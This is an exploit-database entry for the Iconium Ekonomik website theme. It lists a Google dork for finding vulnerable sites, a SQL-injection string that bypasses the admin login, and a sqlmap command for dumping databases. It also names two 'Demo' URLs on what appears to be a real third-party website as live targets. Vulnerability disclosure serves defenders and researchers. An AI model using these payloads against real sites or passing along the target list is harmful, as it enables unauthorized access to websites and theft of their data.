id: 23231
date: 02/03/2015
title: Iconium Ekonomik Theme - Multiple Vulnerabilities
author: Herdem
cves: 

# Exploit Title: Iconium Ekonomik Theme - Multiple Vulnerabilites
# Google Dork: intext:Powered by İconium Mühendislik
# Date: 03.02.2015
# Exploit Author: Herdem
# Vendor Homepage: http://iconiummuhendislik.com
# Software Link: http://iconiummuhendislik.com
# Version: All Versions
# Tested on: Windows / Linux

*******************************************************
**** Author will be not responsible for any damage ****
*******************************************************

================================================================

*** Explanation ***
*** Vulnerability : Login Bypass
*** Vulnerability Area : www.site.com/admin/login.php
*** Exploit code : ' or '1'='1' -- ' ' or '1'='1' /* '

================================================================

*** Explanation ***
*** Vulnerability : Sql İnjection
*** Vulnerability Area : Varies According to the Site ***
*** Exploit code : sqlmap.py -u www.site.com/vulnerabilityarea.php?id=[ID] --dbs

================================================================

Demo : http://koalatravel.com.tr/admin/login.php
Demo : http://www.koalatravel.com.tr/duyuru.php?id=31

================================================================

Greetz : All b3yaz.org members & Mugair

******************************************************

#  0day.today [2023-03-27]  #